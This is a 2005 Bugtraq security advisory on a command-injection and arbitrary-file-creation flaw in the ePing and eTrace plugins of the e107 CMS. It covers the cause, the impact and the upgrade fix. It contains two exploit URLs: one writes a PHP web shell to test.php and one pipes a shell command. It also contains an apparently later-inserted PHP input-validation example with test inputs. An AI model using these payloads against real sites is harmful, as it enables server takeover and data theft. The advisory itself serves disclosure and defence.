Message-ID: <20050805152144.3294.qmail@securityfocus.com>
Date: 5 Aug 2005 15:21:44 -0000
From: os2a.bto@...il.com
To: bugtraq@...urityfocus.com
Subject: Vulnerability in ePing and eTrace plugins of e107


OS2A

ePing Arbitrary File Creation/Command Execution Vulnerability


OS2A ID: OS2A_1001
Status: Patch Released
Published: 08/04/2005
Updated: 08/05/2005

Class: File Creation/Command Execution
Severity: CRITICAL


Overview:
ePing is a ping utility plugin for e107, a PHP-based content management system that uses a MySQL backend database. ePing versions 1.02 and prior are vulnerable to a file creation vulnerability caused by improper validation of user-supplied input in the doping.php script. A remote attacker exploiting this vulnerability could create an arbitrary file on the webserver, or pipe multiple system commands through the eping_host or eping_count parameters of the doping.php script; these commands would be executed within the security context of the hosting site.

eTrace, another utility plugin for e107, has similar vulnerabilities.

Description:
The eping plugin 1.02 and prior for the e107 portal is prone to a remote command execution vulnerability. The vulnerability exists because shell redirection and control operators such as '>', '|' and '&' are not sanitized in the eping_host and eping_count parameters of the doping.php script.

eping_host is checked by a validate function in functions.php, but that function does not consider the characters mentioned above.

eping_count has no validation logic at all; it accepts the shell-significant characters mentioned above.
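As an added example (not ePing's own code), the handling a defender would want for the two parameters described above: each value is allowlisted before it goes anywhere near a shell, and escapeshellarg() is kept as a second line of defence. The hostname/IPv4 rule, the count range of 1 to 10 and the helper names are assumptions made for this example.

```php
<?php
// Added example, not ePing's own code. Names, the hostname rule and the
// count range are assumptions for this demonstration.

function validate_host(string $host): ?string {
    // Accept a dotted IPv4 address or a plain hostname; anything containing
    // spaces, quotes, '|', '>', '&', ';' etc. fails both checks and is refused.
    if (filter_var($host, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) !== false) {
        return $host;
    }
    $label = '[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    if (preg_match('/^(?=.{1,253}$)' . $label . '(\.' . $label . ')*$/', $host)) {
        return $host;
    }
    return null;
}

function validate_count(string $count): ?int {
    // eping_count had no validation at all; an allowlisted integer range
    // leaves no room for shell metacharacters.
    if (!ctype_digit($count)) {
        return null;
    }
    $n = (int) $count;
    return ($n >= 1 && $n <= 10) ? $n : null;
}

function build_ping_command(string $host, string $count): ?string {
    $h = validate_host($host);
    $c = validate_count($count);
    if ($h === null || $c === null) {
        return null;   // refuse to run rather than try to "clean" the input
    }
    // Even validated values are quoted so the shell never sees them as syntax.
    $flag = (strncasecmp(PHP_OS, 'WIN', 3) === 0) ? '-n' : '-c';
    return 'ping ' . $flag . ' ' . escapeshellarg((string) $c) . ' ' . escapeshellarg($h);
}

// Self-check with constructed inputs shaped like the advisory's parameters.
$checks = [
    ['127.0.0.1', '2',               true],
    ['127.0.0.1', '2|dir',           false],
    ['127.0.0.1', '2 "x" >test.php', false],
    ['127.0.0.1|id', '2',            false],
    ['127.0.0.1', '0',               false],
];
foreach ($checks as [$h, $c, $expected]) {
    $ok = (build_ping_command($h, $c) !== null) === $expected;
    echo ($ok ? 'ok   ' : 'FAIL ') . "$h / $c\n";
}
```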


Impact:
A remote user can execute any command using the '|' character, or create a file containing malicious executable code using the '>' character. Execution of arbitrary commands or creation of arbitrary files can lead to denial of service, disclosure or modification of system information, or execution of arbitrary code.


Affected Systems:
ePing version 1.02 and prior
Linux (Any), Unix (Any), Windows (Any)


Exploit:

a. 
http://example.com/e107/e107_plugins/eping/doping.php?eping_cmd=ping%20-n&eping_host=127.0.0.1&eping_count=2%20%22%3C?php%20system(%94cmd.exe%94)?%3E%22%20%3Etest.php

b.
http://example.com/e107/e107_plugins/eping/doping.php?eping_cmd=ping%20-n&eping_host=127.0.0.1&eping_count=2|dir


Solutions:
	Patch:
	Upgrade to version 1.03 of the ePing and eTrace plugins.

